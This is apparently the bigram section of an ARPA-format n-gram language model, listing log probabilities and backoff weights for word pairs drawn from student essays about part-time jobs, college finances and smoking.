-0.98450285 none should -0.048957378
-1.5396936 smoking should -0.40449065
-0.98450285 Smoking should -0.048957378
-1.155199 tobacco should -0.048957378
-2.0901892 can only -0.048957378
-2.6800249 the only -0.13618872
-1.6038444 will only -0.048957378
-2.7957878 , only -0.187397
-1.1494656 not only -0.071063936
-2.8499699 and only -0.048957378
-2.804041 students only -0.048957378
-2.604442 on only -0.048957378
-2.2465868 if only -0.048957378
-1.9552239 should only -0.048957378
-2.460556 money only -0.048957378
-2.2308414 they only -0.048957378
-2.660572 are only -0.048957378
-0.9900276 history only -0.048957378
-2.3715343 people only -0.048957378
-2.2138364 get only -0.048957378
-1.4599607 used only -0.048957378
-1.2856548 Not only -0.048957378
-1.8578128 really only -0.048957378
-1.8311156 was only -0.048957378
-2.880715 be sought -0.048957378
-2.701938 it necessary -0.048957378
-2.0244992 is necessary -0.15595351
-2.332233 the necessary -0.048957378
-2.6787992 as necessary -0.048957378
-2.632936 or necessary -0.048957378
-2.7913516 are necessary -0.048957378
-2.3504152 skills necessary -0.048957378
-1.6391098 financially necessary -0.048957378
-2.079207 If necessary -0.048957378
-2.4197767 for financial -0.187397
-2.6437428 a financial -0.048957378
-2.4807384 the financial -0.04895735
-3.1669025 , financial -0.048957378
-2.6166396 and financial -0.048957378
-2.6266284 of financial -0.048957378
-2.0962207 their financial -0.13618872
-1.9957508 better financial -0.048957378
-1.7497337 personal financial -0.048957378
-0.69242436 grave financial -0.048957378
-2.1809397 these financial -0.048957378
-1.2893543 actual financial -0.048957378
-1.1654861 gaining financial -0.048957378
-0.99141985 brings financial -0.048957378
-0.69242436 face financial -0.048957378
-1.5223992 -LRB- i.e. -0.187397
-3.0886452 and pay -0.048957378
-1.834014 to pay -0.19000496
-2.9123535 students pay -0.048957378
-1.908163 ft pay -0.048957378
-1.6456671 help pay -0.13618872
-2.4193864 them pay -0.048957378
-1.7243168 n't pay -0.048957378
-1.5321847 her pay -0.048957378
-2.938363 for tuition -0.048957378
-2.7912447 the tuition -0.048957378
-1.6865133 upon tuition -0.048957378
-3.0629127 and tuition -0.048957378
-1.8572801 pay tuition -0.048957378
-2.1640978 college tuition -0.048957378
-1.9291258 own tuition -0.048957378
-2.3621502 my tuition -0.048957378
-0.6932658 ever-increasing tuition -0.048957378
-3.2496762 the fees -0.048957378
-2.9430885 their fees -0.048957378
-1.1857961 tuition fees -0.048957378
-2.6663196 or fees -0.048957378
-1.9390326 university fees -0.048957378
-1.3899099 tertiary fees -0.048957378
-2.7708678 <s> Yes -0.27955192
-1.4926801 I agree -0.6717826
-1.4679527 completely agree -0.048957378
-1.9125354 ft agree -0.048957378
-1.16925 strongly agree -0.048957378
-1.16925 largely agree -0.048957378
-0.69368714 totally agree -0.048957378
-2.8395705 <s> college -0.048957378
-2.0139132 with college -0.048957378
-1.8669546 for college -0.9204526
-1.6301835 that college -0.45249942
-1.622262 a college -0.62859064
-2.4844427 is college -0.048957378
-1.6107941 full-time college -0.048957378
-1.9867628 the college -0.08422062
-2.38785 , college -0.13618872
-1.8732889 In college -0.048957378
-1.7100332 many college -0.187397
-1.9408759 any college -0.048957378
-1.6623528 in college -0.16605413
-2.4315457 and college -0.048957378
-1.7414789 of college -0.106249355
-2.3373091 to college -0.09038658
-1.7185972 their college -0.1765346
-1.6750145 For college -0.048957378
-2.2679257 from college -0.048957378
-2.07479 The college -0.048957378
-1.4205079 leave college -0.048957378
-1.6681337 if college -0.048957378
-2.0797336 some college -0.048957378
-1.889248 's college -0.048957378
-1.9779081 most college -0.048957378
-2.2516813 or college -0.048957378
-1.8066765 ; college -0.048957378
-2.1264741 more college -0.048957378
-1.0598776 through college -0.04895735
-1.3925662 at college -0.1765346
-1.6784805 Many college -0.187397
-2.148532 when college -0.048957378
-0.6193371 after college -0.27406517
-1.7849913 all college -0.187397
-0.8465946 Japanese college -0.27955192
-1.9184252 If college -0.187397
-1.8625033 believe college -0.048957378
-2.0997076 fs college -0.048957378
-1.3595473 during college -0.048957378
-1.6819744 enjoy college -0.048957378
-1.8066765 support college -0.048957378
-1.889248 than college -0.048957378
-1.5330975 enter college -0.048957378
-1.7332721 my college -0.187397
-1.4831343 afford college -0.048957378
-1.4205079 poor college -0.048957378
-2.0045042 young college -0.048957378
-0.68533725 non college -0.048957378
-1.1447526 enables college -0.048957378
-1.8175691 think college -0.048957378
-1.1447526 reach college -0.048957378
-0.9774241 easy college -0.048957378
-1.4793464 All college -0.048957378
-0.68533725 inside college -0.048957378
-1.8951879 his college -0.048957378
-0.68533725 whereby college -0.048957378
-1.1488446 among college -0.048957378
-1.261102 including college -0.048957378
-0.9774241 finish college -0.048957378
-0.9774241 post college -0.048957378
-1.1447526 At college -0.048957378
-1.1447526 leaving college -0.048957378
-1.2651135 attending college -0.048957378
-0.9774241 throughout college -0.048957378
-0.68533725 After college -0.048957378
-0.68533725 Advising college -0.048957378
-2.052381 I have -0.1722646
-2.0344038 can have -0.048957378
-2.2846544 that have -0.04895735
-1.14785 will have -0.1747503
-2.6225338 , have -0.048957378
-1.3979636 not have -0.22476706
-1.7684333 cases have -0.048957378
-2.2219865 and have -0.04895735
-1.6900849 to have -0.56148124
-1.4030249 students have -0.067588836
-2.194169 also have -0.048957378
-2.04328 -RRB- have -0.048957378
-1.9675894 then have -0.048957378
-1.2647346 may have -0.048957378
-1.6201711 should have -0.20495787
-1.613422 only have -0.048957378
-2.5056226 college have -0.048957378
-1.0974215 they have -0.06039661
-1.234272 you have -0.04895735
-1.5498656 today have -0.048957378
-2.3402712 or have -0.048957378
-1.6349425 employers have -0.048957378
-2.221475 skills have -0.048957378
-1.160794 who have -0.048957378
-1.5922925 There have -0.048957378
-1.3119942 ft have -0.11268411
-1.0498364 others have -0.20946135
-2.001445 parents have -0.048957378
-2.2464046 people have -0.048957378
-1.8238463 They have -0.04895735
-1.270545 fll have -0.048957378
-2.0455916 could have -0.048957378
-1.9505697 must have -0.048957378
-1.4370916 might have -0.048957378
-1.4950674 workers have -0.048957378
-0.98231244 similarly have -0.048957378
-1.2110279 would have -0.048957378
-1.6999441 always have -0.048957378
-1.7875407 Japan have -0.048957378
-1.3641227 clubs have -0.048957378
-1.6596003 we have -0.187397
-1.270545 thereby have -0.048957378
-0.6878254 meaning have -0.048957378
-0.98231244 players have -0.048957378
-0.6878254 You have -0.048957378
-0.6878254 woman have -0.048957378
-0.6878254 hardly have -0.048957378
-0.6878254 US have -0.048957378
-2.7708678 <s> Time -0.13618872
-2.0782373 with money -0.048957378
-1.9039007 for money -0.20946135
-2.6958623 is money -0.048957378
-1.8136957 the money -0.20025812
-2.9160364 , money -0.048957378
-1.9115413 of money -0.3294234
-2.619987 their money -0.048957378
-1.828914 little money -0.048957378
-2.5175261 as money -0.048957378
-2.1365373 have money -0.048957378
-0.71621805 extra money -0.08422062
-0.6190695 making money -0.27955192
-2.168165 some money -0.048957378
-1.0692556 enough money -0.04895735
-1.0920932 need money -0.048957378
-1.0530574 earn money -0.08422062
-2.1729774 what money -0.048957378
-2.1689255 get money -0.048957378
-1.4451659 make money -0.048957378
-1.003105 earning money -0.048957378
-1.3428849 own money -0.187397
-1.810685 without money -0.048957378
-1.2780342 becomes money -0.048957378
-0.4077425 pocket money -0.13618872
-1.7754562 my money -0.048957378
-1.8164622 getting money -0.048957378
-0.6897705 saved money -0.048957378
-1.5633703 between money -0.048957378
-1.5118419 waste money -0.048957378
-0.6190695 save money -0.11268411
-1.5135939 choose money -0.048957378
-1.0025412 spending money -0.048957378
-0.6897705 Extra money -0.048957378
-0.4077425 prize money -0.048957378
-2.1570249 this they -0.048957378
-2.334775 be they -0.048957378
-1.1097977 that they -0.15780298
-2.3550577 job they -0.048957378
-1.7556858 , they -0.1765346
-2.3234158 not they -0.048957378
-1.7466211 cases they -0.048957378
-1.8984058 employment they -0.048957378
-1.8099457 and they -0.048957378
-1.76665 course they -0.048957378
-2.046208 studying they -0.048957378
-2.208551 experience they -0.048957378
-1.3628817 as they -0.0796529
-1.5363333 time they -0.1722646
-2.111806 school they -0.048957378
-0.5066341 if they -0.26353598
-1.46896 then they -0.048957378
-1.9888595 but they -0.048957378
-1.7504606 necessary they -0.048957378
-2.4442205 college they -0.048957378
-1.8885397 money they -0.04895735
-1.0223186 so they -0.1722646
-1.7338195 : they -0.048957378
-2.260678 or they -0.048957378
-1.8242283 career they -0.048957378
-1.809846 ; they -0.048957378
-1.3508635 industry they -0.048957378
-1.4364922 skills they -0.04895735
-1.8018153 people they -0.048957378
-0.6109376 when they -0.18543062
-2.1597927 do they -0.048957378
-0.94445074 while they -0.3855526
-0.9779645 theories they -0.048957378
-0.9211548 what they -0.15838256
-1.0117494 after they -0.11268411
-2.18483 all they -0.048957378
-0.7052752 because they -0.25144583
-1.9231659 If they -0.048957378
-1.3546883 whatever they -0.048957378
-0.68561304 Neither they -0.048957378
-0.9779645 least they -0.048957378
-1.2719235 which they -0.13618872
-0.41538513 once they -0.048957378
-1.5189977 world they -0.187397
-0.74999696 where they -0.099168696
-1.7661228 find they -0.048957378
-0.9779645 stressful they -0.048957378
-1.8934973 than they -0.048957378
-0.60899943 before they -0.099168696
-1.4810653 until they -0.048957378
-0.9779645 classrooms they -0.048957378
-1.0434618 since they -0.048957378
-0.9779645 argue they -0.048957378
-0.68561304 Maybe they -0.04895735
-1.616619 week they -0.048957378
-1.1455474 sure they -0.048957378
-0.68561304 information they -0.048957378
-0.9779645 connections they -0.048957378
-1.2621411 When they -0.048957378
-0.9779645 doubt they -0.048957378
-1.4220086 everything they -0.048957378
-1.3546883 materials they -0.048957378
-0.9779645 dedication they -0.048957378
-0.9779645 anyway they -0.048957378
-2.6986191 I say -0.048957378
-3.3187766 to say -0.048957378
-2.8121924 they say -0.048957378
-1.7647249 To say -0.048957378
-2.4508684 people say -0.048957378
-2.323799 would say -0.048957378
-1.8634427 <s> And -0.06505798
-1.7612287 that you -0.09038658
-2.3783557 , you -0.11268411
-2.8349316 and you -0.048957378
-1.7039633 if you -0.048957378
-1.6259912 benefit you -0.048957378
-1.8807672 ft you -0.048957378
-1.579988 gives you -0.048957378
-2.3663857 people you -0.048957378
-1.5197701 see you -0.048957378
-1.4117362 when you -0.04895735
-0.6915846 practices you -0.048957378
-1.88691 classes you -0.048957378
-2.0400605 If you -0.187397
-1.3805234 whatever you -0.048957378
-2.21047 get you -0.048957378
-1.5750064 teach you -0.048957378
-1.5262699 once you -0.048957378
-1.5197701 until you -0.048957378
-0.98974967 definition you -0.048957378
-0.6915846 Thank you -0.048957378
-0.98974967 everywhere you -0.048957378
-2.9032245 that extra -0.048957378
-2.5098817 the extra -0.27955192
-3.087084 of extra -0.048957378
-2.8794727 their extra -0.048957378
-1.8775834 little extra -0.04895735
-1.7936063 gain extra -0.048957378
-2.671741 on extra -0.048957378
-2.323302 The extra -0.048957378
-2.411885 an extra -0.048957378
-1.1616051 some extra -0.11268411
-3.340304 , making -0.048957378
-3.0415518 in making -0.048957378
-3.1476786 of making -0.048957378
-3.2905889 to making -0.048957378
-2.0869105 then making -0.048957378
-2.8200238 are making -0.048957378
-2.0182273 about making -0.048957378
-1.7919601 with some -0.04895735
-1.9087481 for some -0.048957378
-2.9581296 , some -0.048957378
-1.4283642 In some -0.187397
-1.9911622 in some -0.25144583
-2.8156636 of some -0.048957378
-1.7263924 For some -0.048957378
-2.107857 has some -0.048957378
-2.546186 on some -0.048957378
-1.5166097 making some -0.048957378
-2.56842 are some -0.13618872
-2.0354357 spend some -0.048957378
-1.9659947 need some -0.048957378
-1.5654893 put some -0.048957378
-0.9872564 putting some -0.048957378
-1.6164061 earn some -0.048957378
-1.6583185 use some -0.048957378
-1.888793 provide some -0.048957378
-1.5654893 teach some -0.048957378
-2.2427747 fs some -0.048957378
-1.8188589 find some -0.048957378
-1.8174039 without some -0.048957378
-1.6145966 just some -0.048957378
-1.5166097 means some -0.048957378
-1.2801979 practice some -0.048957378
-1.8732165 think some -0.048957378
-0.6903279 clean some -0.048957378
-1.6145966 why some -0.048957378
-0.9872564 avoid some -0.048957378
-1.5113788 lose some -0.048957378
-2.5752501 be so -0.048957378
-2.5561922 job so -0.048957378
-2.1707535 is so -0.13618872
-2.2438226 , so -0.048957378
-2.1201158 not so -0.048957378
-2.3051422 and so -0.04895735
-2.4268644 working so -0.048957378
-2.282037 also so -0.048957378
-2.153714 have so -0.048957378
-1.7911842 And so -0.048957378
-2.0121222 become so -0.048957378
-2.2291994 are so -0.048957378
-1.5702835 learned so -0.048957378
-1.9550152 doing so -0.048957378
-1.7752349 do so -0.048957378
-2.0235035 because so -0.048957378
-2.3353882 them so -0.048957378
-2.1769383 education so -0.048957378
-0.69074637 structure so -0.048957378
-1.8979086 years so -0.048957378
-1.8178241 was so -0.048957378
-1.7405639 go so -0.048957378
-1.162232 fun so -0.048957378
-1.6179397 why so -0.048957378
-1.6244801 later so -0.048957378
-0.69074637 chores so -0.048957378
-2.0801263 smoking so -0.048957378
-2.6653895 with bad -0.048957378
-3.1138833 a bad -0.048957378
-3.160214 the bad -0.048957378
-2.6787992 as bad -0.048957378
-2.260646 so bad -0.048957378
-1.8245997 A bad -0.048957378
-1.293329 taste bad -0.187397
-1.5885828 develop bad -0.048957378
-0.6932658 smells bad -0.048957378
-2.5476494 the following -0.13332285
-2.3608074 The following -0.048957378
-2.223746 these following -0.048957378
-1.5679039 world following -0.048957378
-1.6325631 reasons : -0.048957378
-2.8145835 to : -0.048957378
-2.6559741 as : -0.048957378
-2.6871977 college : -0.048957378
-1.3861309 particular : -0.048957378
-1.5320415 purpose : -0.048957378
-1.1667371 fortunate : -0.048957378
-1.1667371 budget : -0.048957378
-1.5854788 spending : -0.048957378
-1.6350522 me : -0.048957378
-1.4629681 habits : -0.048957378
-0.69284487 counter-argument : -0.048957378
-1.8338767 : - -0.048957378
-2.2918823 part - -0.048957378
-2.0090806 society - -0.048957378
-2.0472798 smoke - -0.048957378
-2.0595405 <s> To -0.048957378
-1.8357562 : To -0.048957378
-1.2950919 - To -0.048957378
-2.6954308 will begin -0.048957378
-2.9442508 students begin -0.048957378
-1.1858512 To begin -0.048957378
-1.3905429 likely begin -0.048957378
-1.1696702 difficulties begin -0.048957378
-3.340304 , today -0.048957378
-2.0174642 In today -0.048957378
-2.5359309 in today -0.187397
-3.1476786 of today -0.048957378
-1.6857617 employers today -0.048957378
-1.6409096 me today -0.048957378
-0.69354665 happing today -0.048957378
-1.5202303 it 's -0.099168696
-2.9155905 that 's -0.048957378
-1.7359056 student 's -0.04895735
-0.9312699 one 's -0.13332285
-1.5885828 today 's -0.048957378
-2.4326057 people 's -0.048957378
-1.8797346 It 's -0.048957378
-1.2917377 That 's -0.048957378
-1.7239105 person 's -0.048957378
-2.2036474 job market -0.048957378
-2.0130277 employment market -0.048957378
-2.640829 can become -0.048957378
-2.6514506 will become -0.048957378
-3.2669423 , become -0.048957378
-2.3865013 and become -0.04895735
-1.8784709 to become -0.2432137
-0.73677033 has become -0.048957378
-2.7762349 they become -0.048957378
-1.9026326 They become -0.04895735
-1.586929 perhaps become -0.048957378
-0.6931254 workloads become -0.048957378
-3.2358162 a highly -0.048957378
-3.0808864 is highly -0.048957378
-2.0807586 become highly -0.048957378
-2.332246 would highly -0.048957378
-1.295562 highly competitive -0.048957378
-2.415659 more competitive -0.048957378
-2.4042468 for most -0.048957378
-2.8053942 that most -0.048957378
-2.8470347 is most -0.048957378
-2.4587548 the most -0.099168696
-2.384211 , most -0.20946135
-1.9840088 In most -0.048957378
-2.1947784 in most -0.20946135
-2.5822704 and most -0.13618872
-2.6012638 of most -0.048957378
-2.7633367 their most -0.048957378
-2.272496 The most -0.048957378
-2.0615287 spend most -0.048957378
-1.580486 entering most -0.048957378
-2.157655 which most -0.048957378
-2.2725682 would most -0.048957378
-2.1596465 learn most -0.048957378
-1.5216572 So most -0.048957378
-1.2862043 Perhaps most -0.048957378
-1.2862043 its most -0.048957378
-2.213457 a degree -0.099168696
-2.9430885 their degree -0.048957378
-2.7264938 college degree -0.048957378
-2.6663196 or degree -0.048957378
-1.5351577 business degree -0.048957378
-0.69368714 four-year degree -0.048957378
-2.7198546 it does -0.048957378
-1.6409096 degree does -0.048957378
-1.5906644 benefits does -0.048957378
-0.99365675 alternative does -0.048957378
-2.2694683 what does -0.048957378
-0.69354665 exactly does -0.048957378
-2.0398965 smoke does -0.048957378
-2.7659814 not guarantee -0.048957378
-1.9456341 no guarantee -0.048957378
-2.7810078 <s> or -0.048957378
-2.3264356 it or -0.048957378
-1.7787709 job or -0.11268411
-1.6602305 graduation or -0.048957378
-1.484383 , or -0.07191783
-2.0958743 study or -0.048957378
-2.0187666 studying or -0.048957378
-1.7533882 little or -0.048957378
-2.2429714 working or -0.048957378
-1.6986228 restaurant or -0.048957378
-2.0238082 studies or -0.048957378
-2.3727958 time or -0.048957378
-2.3568823 work or -0.048957378
-1.4597224 -LRB- or -0.048957378
-2.1438668 may or -0.048957378
-1.6797485 tuition or -0.048957378
-2.400025 college or -0.048957378
-1.8751298 well or -0.048957378
-0.6838237 newspapers or -0.048957378
-1.4167714 whether or -0.048957378
-1.2554307 organization or -0.048957378
-1.7265065 important or -0.048957378
-1.5231602 learned or -0.048957378
-1.6716728 food or -0.048957378
-1.1813785 parents or -0.099168696
-1.4123452 major or -0.048957378
-1.7976108 classes or -0.048957378
-0.97446364 fields or -0.048957378
-1.4167714 club or -0.048957378
-1.8213432 university or -0.048957378
-1.5189182 expenses or -0.048957378
-0.6838237 grants or -0.048957378
-1.7475386 family or -0.048957378
-2.064882 education or -0.048957378
-1.9252164 learning or -0.048957378
-0.6838237 time-consuming or -0.048957378
-0.97446364 organizations or -0.048957378
-0.6838237 son or -0.048957378
-1.2554307 him or -0.187397
-1.2554307 government or -0.048957378
-1.2554307 courses or -0.048957378
-0.6838237 book or -0.048957378
-1.3426465 rent or -0.048957378
-0.6838237 toilets or -0.048957378
-1.347171 law or -0.048957378
-1.6979965 days or -0.048957378
-1.3426465 homework or -0.048957378
-0.6838237 teens or -0.048957378
-1.2554307 positive or -0.048957378
-0.71159285 class or -0.048957378
-0.5786866 company or -0.048957378
-0.97446364 references or -0.048957378
-0.8432839 he or -0.27955192
-0.6838237 likes or -0.048957378
-0.97446364 finance or -0.048957378
-0.6838237 design or -0.048957378
-0.6838237 sports or -0.048957378
-0.6838237 sooner or -0.048957378
-1.4149343 his or -0.187397
-0.6838237 delay or -0.048957378
-0.97446364 schools or -0.048957378
-0.6838237 partly or -0.048957378
-0.97446364 lab or -0.048957378
-0.6838237 house or -0.048957378
-1.3426465 employees or -0.048957378
-0.6838237 hotels or -0.048957378
-0.97446364 Whether or -0.048957378
-0.6838237 men or -0.048957378
-0.40535554 experiments or -0.048957378
-0.97446364 bars or -0.048957378
-0.97446364 diploma or -0.048957378
-1.1404077 man or -0.048957378
-0.6838237 stores or -0.048957378
-0.6838237 sons or -0.048957378
-1.3426465 eat or -0.048957378
-0.97446364 worries or -0.048957378
-0.6838237 30 or -0.048957378
-3.0111382 that pays -0.048957378
-1.5378767 generally pays -0.048957378
-2.5958927 with well -0.048957378
-2.3562336 this well -0.048957378
-2.6293688 it well -0.048957378
-2.6613982 be well -0.048957378
-2.9553328 a well -0.048957378
-2.8592598 is well -0.048957378
-1.8125416 cases well -0.048957378
-1.0680895 as well -0.53915703
-2.225849 so well -0.048957378
-0.99058396 pays well -0.048957378
-1.3823845 As well -0.048957378
-1.9749511 doing well -0.048957378
-1.7859211 do well -0.048957378
-0.99058396 works well -0.048957378
-2.1286578 could well -0.048957378
-0.99058396 function well -0.048957378
-1.8083847 A well -0.048957378
-1.45804 tasks well -0.048957378
-2.328378 <s> Most -0.09038658
-3.4204583 the advertisements -0.048957378
-3.0111382 that appear -0.048957378
-2.3941946 may appear -0.048957378
-3.4204583 the newspapers -0.048957378
-2.7364948 on on-line -0.048957378
-0.6942867 on-line portals -0.048957378
-3.4000094 the preferred -0.048957378
-2.1200047 much preferred -0.048957378
-1.4711709 pursuing candidates -0.048957378
-0.99501497 preferred candidates -0.048957378
-2.2634602 , even -0.1722646
-2.6035779 not even -0.048957378
-1.8125416 cases even -0.048957378
-2.3463118 and even -0.04895735
-2.9576278 of even -0.048957378
-3.0623753 to even -0.048957378
-2.052564 -LRB- even -0.048957378
-1.79566 may even -0.048957378
-2.7121813 they even -0.048957378
-1.7906737 or even -0.048957378
-0.99058396 candidates even -0.048957378
-2.0639803 spend even -0.048957378
-2.0894055 up even -0.048957378
-1.627021 But even -0.048957378
-1.5782256 perhaps even -0.048957378
-1.7886138 want even -0.048957378
-1.1642387 fulfill even -0.048957378
-0.99058396 possibly even -0.048957378
-3.0452757 for entry -0.048957378
-2.4277496 this level -0.048957378
-3.1828704 a level -0.048957378
-2.8272688 the level -0.187397
-1.8319273 necessary level -0.048957378
-0.69368714 entry level -0.048957378
-1.16925 energy level -0.048957378
-1.9169102 part-time positions -0.048957378
-2.1861217 such positions -0.048957378
-1.4689857 level positions -0.048957378
-1.8331021 high positions -0.048957378
-1.2934115 labor positions -0.048957378
-0.9939372 treasurer positions -0.048957378
-1.5985401 reasons are -0.048957378
-1.6295338 that are -0.048957378
-2.0397775 job are -0.048957378
-2.27138 student are -0.048957378
-2.5350275 , are -0.048957378
-1.9472449 and are -0.048957378
-1.1913064 there are -0.04895735
-1.1553122 students are -0.0942272
-1.5524418 jobs are -0.048957378
-0.97715414 effectively are -0.048957378
-1.9818754 but are -0.048957378
-2.066927 college are -0.048957378
-0.99709177 they are -0.11830317
-0.8995415 you are -0.08422062
-1.5753517 following are -0.048957378
-1.5321846 today are -0.048957378
-1.4823278 positions are -0.048957378
-1.4350866 skills are -0.04895735
-1.6096346 These are -0.048957378
-0.83870685 who are -0.04895735
-1.8426574 themselves are -0.048957378
-1.5716527 There are -0.2603527
-1.4905598 parents are -0.04895735
-1.8760486 doing are -0.048957378
-1.7976505 people are -0.048957378
-1.7892362 They are -0.048957378
-1.2605834 People are -0.048957378
-1.8122691 classes are -0.048957378
-0.97715414 Workers are -0.048957378
-0.68519944 Evaluations are -0.048957378
-0.68519944 Internships are -0.048957378
-1.8895272 activities are -0.048957378
-1.7114832 responsibilities are -0.048957378
-1.8361113 university are -0.048957378
-1.0436594 finances are -0.048957378
-1.575384 which are -0.048957378
-1.5284172 expenses are -0.048957378
-2.0214574 these are -0.048957378
-1.7426505 customers are -0.048957378
-1.5716527 force are -0.048957378
-0.68519944 campuses are -0.048957378
-0.68519944 discovery are -0.048957378
-1.2605834 factors are -0.048957378
-1.4823278 Some are -0.048957378
-1.1443559 offers are -0.048957378
-1.1443559 ethics are -0.048957378
-1.1261823 lives are -0.048957378
-1.8888688 things are -0.048957378
-1.7583526 Japan are -0.048957378
-1.7256835 hours are -0.048957378
-1.7109224 days are -0.048957378
-0.68519944 never-the-less are -0.048957378
-1.5284172 companies are -0.048957378
-0.97715414 reports are -0.048957378
-1.1539313 we are -0.048957378
-0.97715414 classmates are -0.048957378
-1.4862003 children are -0.048957378
-0.68519944 shoppers are -0.048957378
-0.68519944 averages are -0.048957378
-1.2605834 weekends are -0.048957378
-0.68519944 superiors are -0.048957378
-0.68519944 rejected are -0.048957378
-0.68519944 signs are -0.048957378
-1.985316 smoking are -0.048957378
-1.9137187 smoke are -0.048957378
-0.97715414 Restaurants are -0.048957378
-0.68519944 unknowingly are -0.048957378
-2.4314516 <s> As -0.099168696
-3.4931862 , As -0.048957378
-1.6903851 several ways -0.048957378
-2.7730234 have ways -0.048957378
-2.223746 these ways -0.048957378
-2.0831351 out ways -0.048957378
-2.200288 a career -0.048957378
-3.0686293 of career -0.048957378
-2.864925 their career -0.048957378
-0.95117176 chosen career -0.048957378
-2.7644556 are career -0.048957378
-1.4443519 future career -0.048957378
-1.464479 different career -0.048957378
-1.1671549 successful career -0.048957378
-2.3515894 my career -0.048957378
-1.1671549 whose career -0.048957378
-0.6929851 targeted career -0.048957378
-1.9226208 career oriented -0.048957378
-2.4081247 by internships -0.048957378
-3.21812 of internships -0.048957378
-2.7197275 as internships -0.048957378
-1.6444623 offer internships -0.048957378
-3.2085369 a practical -0.048957378
-2.0431418 valuable practical -0.048957378
-3.3971481 , practical -0.048957378
-1.5351007 see practical -0.048957378
-1.592756 develop practical -0.048957378
-2.3354475 The experiences -0.048957378
-1.388153 practical experiences -0.048957378
-1.683961 These experiences -0.048957378
-1.4662849 educational experiences -0.048957378
-2.1316676 social experiences -0.048957378
-2.0727339 learning experiences -0.048957378
-1.388153 invaluable experiences -0.048957378
-1.292295 Those experiences -0.048957378
-2.328378 <s> Another -0.13618872
-1.2958019 Another option -0.048957378
-2.0134587 <s> Part-time -0.26607528
-2.7126353 job offer -0.048957378
-2.698859 not offer -0.048957378
-3.0886452 and offer -0.048957378
-2.852691 to offer -0.048957378
-2.472681 jobs offer -0.048957378
-2.3685565 may offer -0.048957378
-1.9072032 They offer -0.048957378
-2.1602967 could offer -0.048957378
-1.106328 several benefits -0.187397
-2.802924 the benefits -0.187397
-2.3429945 many benefits -0.048957378
-1.5891323 potential benefits -0.048957378
-1.9544258 other benefits -0.048957378
-1.388153 immediate benefits -0.048957378
-1.5326759 Some benefits -0.048957378
-0.9933765 principle benefits -0.048957378
-3.644728 <s> Primarily -0.048957378
-1.8144643 will benefit -0.04895735
-2.167287 has benefit -0.048957378
-2.3863747 also benefit -0.048957378
-1.9993248 financial benefit -0.048957378
-1.2928529 another benefit -0.048957378
-1.6409096 professional benefit -0.048957378
-1.467118 added benefit -0.048957378
-3.644728 <s> Apart -0.048957378
-1.3940754 a part -1.0148947
-2.6958623 is part -0.048957378
-2.2421405 the part -0.25144583
-2.1395745 , part -0.3855526
-2.4732556 and part -0.187397
-2.7770655 of part -0.048957378
-2.3063238 their part -0.048957378
-2.1170542 studying part -0.048957378
-1.4326391 working part -0.50140065
-2.7045262 students part -0.048957378
-1.8538234 work part -0.27955192
-1.8087573 being part -0.048957378
-1.6627073 have part -0.5805819
-2.0244231 even part -0.048957378
-2.2687714 important part -0.187397
-1.9226633 through part -0.048957378
-2.3882751 at part -0.048957378
-1.9401183 doing part -0.048957378
-1.7848566 your part -0.048957378
-1.8990567 take part -0.048957378
-2.1689255 get part -0.048957378
-1.2384373 A part -0.50140065
-2.115686 these part -0.048957378
-1.3725495 particular part -0.048957378
-0.6897705 consume part -0.048957378
-1.5097663 Working part -0.048957378
-0.6897705 pointless part -0.048957378
-1.3725495 essential part -0.048957378
-0.6897705 usual part -0.048957378
-1.8206525 had part -0.048957378
-0.6897705 indispensable part -0.048957378
-1.1576457 indeed part -0.048957378
-0.9861529 distracting part -0.048957378
-0.9861529 Any part -0.048957378
-2.013934 employment lays -0.048957378
-2.878185 the foundation -0.048957378
-1.8055046 real foundation -0.048957378
-3.2799814 and history -0.048957378
-2.7940712 work history -0.048957378
-2.4358826 for future -0.048957378
-2.3242965 the future -0.12183642
-1.9122841 their future -0.14912641
-2.0743585 -LRB- future -0.048957378
-1.808525 my future -0.048957378
-1.4622438 his future -0.048957378
-1.5292882 her future -0.048957378
-1.1671549 entire future -0.048957378
-1.1671549 desired future -0.048957378
-0.6929851 brighter future -0.048957378
-0.6929851 tolerate future -0.048957378
-2.1588707 very carefully -0.048957378
-2.5494218 should carefully -0.048957378
-1.5938057 By carefully -0.048957378
-1.1700908 weigh carefully -0.048957378
-2.6954308 will consider -0.048957378
-2.250529 to consider -0.1722646
-1.293971 carefully consider -0.048957378
-2.0448897 must consider -0.048957378
-1.5353987 universities consider -0.048957378
-3.2979217 and select -0.048957378
-2.031715 In order -0.048957378
-1.4732497 in order -0.8438233
-2.045974 valuable skill -0.048957378
-2.2828684 one skill -0.048957378
-2.7759395 work skill -0.048957378
-2.4027975 life skill -0.048957378
-2.1737337 <s> By -0.0796529
-1.5956279 f By -0.048957378
-1.2958019 carefully selecting -0.048957378
-3.4204583 the gaps -0.048957378
-2.6489563 with academic -0.048957378
-2.197615 the academic -0.1722646
-2.9850137 in academic -0.048957378
-3.1932025 to academic -0.048957378
-1.778757 their academic -0.048957378
-2.66345 as academic -0.048957378
-2.6645222 on academic -0.048957378
-2.2063816 only academic -0.048957378
-1.9465262 our academic -0.048957378
-2.0258944 his academic -0.048957378
-1.2906253 purely academic -0.048957378
-3.2676826 of qualification -0.048957378
-1.9211627 academic qualification -0.048957378
-2.880715 be minimized -0.048957378
-2.6210346 not ; -0.048957378
-2.1673005 studies ; -0.048957378
-2.2506866 school ; -0.048957378
-2.4787517 money ; -0.048957378
-2.000383 future ; -0.048957378
-0.6922843 minimized ; -0.048957378
-1.9843484 society ; -0.048957378
-1.8540891 living ; -0.048957378
-1.2878569 arguments ; -0.048957378
-2.2060153 education ; -0.048957378
-2.1076722 world ; -0.048957378
-1.3836298 campus ; -0.048957378
-0.9911411 suffer ; -0.048957378
-1.6304226 independence ; -0.048957378
-1.1650699 basis ; -0.048957378
-0.6922843 expertise ; -0.048957378
-2.710804 it makes -0.048957378
-2.596196 student makes -0.048957378
-2.6842268 and makes -0.048957378
-2.4195924 experience makes -0.048957378
-1.8548925 environment makes -0.048957378
-2.0984945 This makes -0.048957378
-1.8818965 It makes -0.048957378
-0.6934062 indirectly makes -0.048957378
-3.4000094 the candidate -0.048957378
-1.4711709 poor candidate -0.048957378
-1.7283275 be more -0.048957378
-2.0377142 having more -0.048957378
-2.4830453 a more -0.048957378
-2.1342297 is more -0.13618872
-2.70885 of more -0.048957378
-1.8138318 little more -0.048957378
-2.5265045 time more -0.048957378
-1.619328 agree more -0.048957378
-2.1177042 have more -0.048957378
-2.372181 money more -0.048957378
-1.9725738 become more -0.048957378
-2.37433 or more -0.048957378
-1.5047102 even more -0.048957378
-1.7527298 are more -0.048957378
-1.601476 offer more -0.048957378
-0.9839542 candidate more -0.048957378
